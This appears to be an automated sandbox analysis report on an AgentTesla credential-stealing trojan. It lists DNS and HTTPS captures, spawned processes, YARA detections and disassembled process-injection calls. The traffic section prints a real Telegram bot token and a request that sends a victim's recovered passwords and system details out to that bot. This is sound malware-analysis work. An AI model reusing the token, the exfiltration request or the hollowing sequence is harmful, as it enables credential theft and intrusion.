                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                      May 4, 2022 14:38:04.750358105 CEST192.168.2.48.8.8.80x9334Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                      May 4, 2022 14:37:54.344527006 CEST8.8.8.8192.168.2.40x4f0bNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                      May 4, 2022 14:38:04.768125057 CEST8.8.8.8192.168.2.40x9334No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • api.telegram.org

                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                      0192.168.2.449768149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                      2022-05-04 12:38:05 UTC0OUTPOST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560c
                                                                                                                                      Host: api.telegram.org
                                                                                                                                      Content-Length: 754
                                                                                                                                      Expect: 100-continue
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2022-05-04 12:38:05 UTC0INHTTP/1.1 100 Continue
                                                                                                                                      2022-05-04 12:38:05 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 32 64 64 66 38 34 30 31 35 36 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 31 33 31 38 31 30 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 32 64 64 66 38 34 30 31 35 36 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 30 36 31 35 34 34 0a 4f 53 46 75 6c 6c
                                                                                                                                      Data Ascii: -----------------------------8da2ddf8401560cContent-Disposition: form-data; name="chat_id"1131810225-----------------------------8da2ddf8401560cContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/061544OSFull
                                                                                                                                      2022-05-04 12:38:05 UTC1INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                      Date: Wed, 04 May 2022 12:38:05 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 606
                                                                                                                                      Connection: close
                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                      {"ok":true,"result":{"message_id":11954,"from":{"id":1698102386,"is_bot":true,"first_name":"hyacith","username":"ugochibot"},"chat":{"id":1131810225,"first_name":"uwe","last_name":"Karen","type":"private"},"date":1651667885,"document":{"file_name":"user-061544 2022-05-04 03-05-05.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIusmJyc62WHLhzqejVctcsRLOLg5xoAAI1AgACduCZRwoWHQEMSu5XJAQ","file_unique_id":"AgADNQIAAnbgmUc","file_size":184},"caption":"New PW Recovered!\n\nUser Name: user/061544\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:14:37:19
                                                                                                                                      Start date:04/05/2022
                                                                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe"
                                                                                                                                      Imagebase:0xee0000
                                                                                                                                      File size:689664 bytes
                                                                                                                                      MD5 hash:5D5F37A7CF3A9FF4277B3A9DC2C4B9D2
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low

                                                                                                                                      General

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:14:37:44
                                                                                                                                      Start date:04/05/2022
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      Imagebase:0xa50000
                                                                                                                                      File size:261728 bytes
                                                                                                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:14:38:06
                                                                                                                                      Start date:04/05/2022
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                                                                                                                                      Imagebase:0x550000
                                                                                                                                      File size:261728 bytes
                                                                                                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                                                                      • Detection: 0%, Metadefender, Browse
                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:14:38:07
                                                                                                                                      Start date:04/05/2022
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff647620000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:14:38:15
                                                                                                                                      Start date:04/05/2022
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                                                                                                                                      Imagebase:0x600000
                                                                                                                                      File size:261728 bytes
                                                                                                                                      MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:14:38:16
                                                                                                                                      Start date:04/05/2022
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff647620000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:12.4%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:115
                                                                                                                                        Total number of Limit Nodes:10
                                                                                                                                        execution_graph 16423 7ca7f08 16424 7ca7f48 VirtualAllocEx 16423->16424 16426 7ca7f85 16424->16426 16427 7ca8118 16428 7ca8163 ReadProcessMemory 16427->16428 16430 7ca81a7 16428->16430 16473 7ca7ff8 16474 7ca8040 WriteProcessMemory 16473->16474 16476 7ca8097 16474->16476 16431 32594b0 16432 32594bf 16431->16432 16435 32595a8 16431->16435 16443 3259598 16431->16443 16436 32595bb 16435->16436 16437 32595d3 16436->16437 16451 3259820 16436->16451 16455 3259830 16436->16455 16437->16432 16438 32595cb 16438->16437 16439 32597d0 GetModuleHandleW 16438->16439 16440 32597fd 16439->16440 16440->16432 16444 32595bb 16443->16444 16445 32595d3 16444->16445 16449 3259820 LoadLibraryExW 16444->16449 16450 3259830 LoadLibraryExW 16444->16450 16445->16432 16446 32595cb 16446->16445 16447 32597d0 GetModuleHandleW 16446->16447 16448 32597fd 16447->16448 16448->16432 16449->16446 16450->16446 16452 3259844 16451->16452 16454 3259869 16452->16454 16459 32588d8 16452->16459 16454->16438 16456 3259844 16455->16456 16457 3259869 16456->16457 16458 32588d8 LoadLibraryExW 16456->16458 16457->16438 16458->16457 16460 3259a10 LoadLibraryExW 16459->16460 16462 3259a89 16460->16462 16462->16454 16477 325b890 GetCurrentProcess 16478 325b903 16477->16478 16479 325b90a GetCurrentThread 16477->16479 16478->16479 16480 325b947 GetCurrentProcess 16479->16480 16481 325b940 16479->16481 16483 325b97d 16480->16483 16481->16480 16482 325b9a5 GetCurrentThreadId 16484 325b9d6 16482->16484 16483->16482 16485 32540d0 16486 32540e2 16485->16486 16487 32540ee 16486->16487 16491 32541e0 16486->16491 16496 3253868 16487->16496 16489 325410d 16492 3254205 16491->16492 16500 32542e0 16492->16500 16504 32542d0 16492->16504 16497 3253873 16496->16497 16512 325586c 16497->16512 16499 3256a31 16499->16489 16501 3254307 16500->16501 16503 32543e4 16501->16503 16508 32538a8 16501->16508 16506 3254307 16504->16506 16505 32543e4 16505->16505 16506->16505 16507 32538a8 CreateActCtxA 16506->16507 16507->16505 16509 3255370 CreateActCtxA 16508->16509 16511 3255433 16509->16511 16513 3255877 16512->16513 16516 325588c 16513->16516 16515 3256c5d 16515->16499 16517 3255897 16516->16517 16520 32558bc 16517->16520 16519 3256d3a 16519->16515 16521 32558c7 16520->16521 16524 32558ec 16521->16524 16523 3256e2a 16523->16519 16525 32558f7 16524->16525 16526 325757c 16525->16526 16528 325b5b9 16525->16528 16526->16523 16530 325b5e9 16528->16530 16529 325b60d 16529->16526 16530->16529 16533 325b771 16530->16533 16537 325b778 16530->16537 16534 325b785 16533->16534 16535 325b7bf 16534->16535 16541 325a25c 16534->16541 16535->16529 16538 325b785 16537->16538 16539 325a25c 2 API calls 16538->16539 16540 325b7bf 16538->16540 16539->16540 16540->16529 16542 325a267 16541->16542 16543 325c4b8 16542->16543 16545 325c078 16542->16545 16546 325c083 16545->16546 16547 32558ec 2 API calls 16546->16547 16548 325c527 16547->16548 16552 325e2a8 16548->16552 16558 325e290 16548->16558 16549 325c560 16549->16543 16554 325e325 16552->16554 16555 325e2d9 16552->16555 16553 325e2e5 16553->16549 16554->16549 16555->16553 16556 325e720 LoadLibraryExW GetModuleHandleW 16555->16556 16557 325e728 LoadLibraryExW GetModuleHandleW 16555->16557 16556->16554 16557->16554 16560 325e325 16558->16560 16561 325e2d9 16558->16561 16559 325e2e5 16559->16549 16560->16549 16561->16559 16562 325e720 LoadLibraryExW GetModuleHandleW 16561->16562 16563 325e728 LoadLibraryExW GetModuleHandleW 16561->16563 16562->16560 16563->16560 16463 7ca7c90 16464 7ca7cd0 ResumeThread 16463->16464 16466 7ca7d01 16464->16466 16467 7ca8310 16468 7ca8399 CreateProcessA 16467->16468 16470 7ca855b 16468->16470 16564 7ca7d70 16565 7ca7db5 SetThreadContext 16564->16565 16567 7ca7dfd 16565->16567 16471 325bab8 DuplicateHandle 16472 325bb4e 16471->16472

                                                                                                                                        Executed Functions

                                                                                                                                        Function 0325B880 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0325B8F0
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0325B92D
                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0325B96A
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0325B9C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                        • Opcode ID: 543444b51dd64ae458a86e9df86bbd703f349d968e2e9f6fb0892f54beb15b85
                                                                                                                                        • Instruction ID: 0cf0581c6dc5547eae6e6f16cf73c62e0bbc662f0ec99f35af482d149d0bfed5
                                                                                                                                        • Opcode Fuzzy Hash: 543444b51dd64ae458a86e9df86bbd703f349d968e2e9f6fb0892f54beb15b85
                                                                                                                                        • Instruction Fuzzy Hash: BB5132B09046498FDB10DFAAD988BDEFBF0AF49314F24845AE419A7250C7746988CF65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0325B890 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0325B8F0
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0325B92D
                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0325B96A
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0325B9C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                        • Opcode ID: aaca75420acd80ffc2bfcf43bb5a6a6519a5b66be124b5f3a86b038f27372672
                                                                                                                                        • Instruction ID: 0b85624d1e6e8868910f89cb504995ef41c88d4e5e397310a535ff1e078d8eaf
                                                                                                                                        • Opcode Fuzzy Hash: aaca75420acd80ffc2bfcf43bb5a6a6519a5b66be124b5f3a86b038f27372672
                                                                                                                                        • Instruction Fuzzy Hash: 2D5121B09006498FDB50DFAAD588BEEFBF0AF88314F24845AE419B7350D7746988CF65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07CA8310 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 43 7ca8310-7ca83a5 45 7ca83de-7ca83fe 43->45 46 7ca83a7-7ca83b1 43->46 53 7ca8400-7ca840a 45->53 54 7ca8437-7ca8466 45->54 46->45 47 7ca83b3-7ca83b5 46->47 48 7ca83d8-7ca83db 47->48 49 7ca83b7-7ca83c1 47->49 48->45 51 7ca83c3 49->51 52 7ca83c5-7ca83d4 49->52 51->52 52->52 55 7ca83d6 52->55 53->54 56 7ca840c-7ca840e 53->56 60 7ca8468-7ca8472 54->60 61 7ca849f-7ca8559 CreateProcessA 54->61 55->48 58 7ca8410-7ca841a 56->58 59 7ca8431-7ca8434 56->59 62 7ca841e-7ca842d 58->62 63 7ca841c 58->63 59->54 60->61 65 7ca8474-7ca8476 60->65 74 7ca855b-7ca8561 61->74 75 7ca8562-7ca85e8 61->75 62->62 64 7ca842f 62->64 63->62 64->59 66 7ca8478-7ca8482 65->66 67 7ca8499-7ca849c 65->67 69 7ca8486-7ca8495 66->69 70 7ca8484 66->70 67->61 69->69 72 7ca8497 69->72 70->69 72->67 74->75 85 7ca85ea-7ca85ee 75->85 86 7ca85f8-7ca85fc 75->86 85->86 87 7ca85f0 85->87 88 7ca85fe-7ca8602 86->88 89 7ca860c-7ca8610 86->89 87->86 88->89 90 7ca8604 88->90 91 7ca8612-7ca8616 89->91 92 7ca8620-7ca8624 89->92 90->89 91->92 95 7ca8618 91->95 93 7ca8636-7ca863d 92->93 94 7ca8626-7ca862c 92->94 96 7ca863f-7ca864e 93->96 97 7ca8654 93->97 94->93 95->92 96->97
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07CA8546
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.326132287.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_7ca0000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: 422b56a687c8985c723cb1e2094b88aa3851347f05ab3882f52c702b24758076
                                                                                                                                        • Instruction ID: 18749ca89971983b1e374c3acbf90cc9a3b1b5b71280b2133232e7e5e3b2b88e
                                                                                                                                        • Opcode Fuzzy Hash: 422b56a687c8985c723cb1e2094b88aa3851347f05ab3882f52c702b24758076
                                                                                                                                        • Instruction Fuzzy Hash: 48914AB1D0065ADFEF21CF64C8817DEBBF2BB48319F0485A9D809A7240DB749A85CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 032595A8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 99 32595a8-32595bd call 3257294 102 32595d3-32595d7 99->102 103 32595bf 99->103 104 32595d9-32595e3 102->104 105 32595eb-325962c 102->105 152 32595c5 call 3259820 103->152 153 32595c5 call 3259830 103->153 104->105 110 325962e-3259636 105->110 111 3259639-3259647 105->111 106 32595cb-32595cd 106->102 108 3259708-32597c8 106->108 147 32597d0-32597fb GetModuleHandleW 108->147 148 32597ca-32597cd 108->148 110->111 113 3259649-325964e 111->113 114 325966b-325966d 111->114 115 3259650-3259657 call 325887c 113->115 116 3259659 113->116 117 3259670-3259677 114->117 120 325965b-3259669 115->120 116->120 121 3259684-325968b 117->121 122 3259679-3259681 117->122 120->117 124 325968d-3259695 121->124 125 3259698-32596a1 call 325888c 121->125 122->121 124->125 129 32596a3-32596ab 125->129 130 32596ae-32596b3 125->130 129->130 132 32596b5-32596bc 130->132 133 32596d1-32596de 130->133 132->133 134 32596be-32596ce call 325889c call 32588ac 132->134 140 3259701-3259707 133->140 141 32596e0-32596fe 133->141 134->133 141->140 149 3259804-3259818 147->149 150 32597fd-3259803 147->150 148->147 150->149 152->106 153->106
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 032597EE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: 7b30e38de2b6d66bc154eabc19c1ac29d014ca741b9018caaa7f7b6067d39b79
                                                                                                                                        • Instruction ID: a8749e345ab6ca05b387284a4bfc87cfa426694d89f46c4c66c4a0aab3ece2dd
                                                                                                                                        • Opcode Fuzzy Hash: 7b30e38de2b6d66bc154eabc19c1ac29d014ca741b9018caaa7f7b6067d39b79
                                                                                                                                        • Instruction Fuzzy Hash: 64712570A10B058FDB24DF29D04475AB7F5FF88204F048A2DE946DBA40DB75E989CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 03255364 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 154 3255364-3255431 CreateActCtxA 156 3255433-3255439 154->156 157 325543a-3255494 154->157 156->157 164 3255496-3255499 157->164 165 32554a3-32554a7 157->165 164->165 166 32554a9-32554b5 165->166 167 32554b8 165->167 166->167 169 32554b9 167->169 169->169
                                                                                                                                        APIs
                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 03255421
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: 0d3ecf53159963cce4addc42b76bd09d601b882509392064ceb621fa89621393
                                                                                                                                        • Instruction ID: 001d8f446d62158cd1de2d9d7bd0ff89c65489479261d6ec599d3cdbd65b5507
                                                                                                                                        • Opcode Fuzzy Hash: 0d3ecf53159963cce4addc42b76bd09d601b882509392064ceb621fa89621393
                                                                                                                                        • Instruction Fuzzy Hash: 7241F070C00219CEDB24CFA9C884BCDBBB1FF89305F258169D419AB251DB796A86CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 032538A8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 170 32538a8-3255431 CreateActCtxA 173 3255433-3255439 170->173 174 325543a-3255494 170->174 173->174 181 3255496-3255499 174->181 182 32554a3-32554a7 174->182 181->182 183 32554a9-32554b5 182->183 184 32554b8 182->184 183->184 186 32554b9 184->186 186->186
                                                                                                                                        APIs
                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 03255421
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.317617120.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_3250000_SecuriteInfo.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: 0b7b380ed21102bbe551103886d41d44d6cb754a149a6cc093bee9d17c363c5d
                                                                                                                                        • Instruction ID: 970952147c48a212712ef1f66f41eeceffb7dd522487df99d5b92398210db956
                                                                                                                                        • Opcode Fuzzy Hash: 0b7b380ed21102bbe551103886d41d44d6cb754a149a6cc093bee9d17c363c5d
                                                                                                                                        • Instruction Fuzzy Hash: 61410370C1021DCADF20CFA9C88478DBBB1BF49304F218059E409AB251DB756985CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 07CA7FF8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
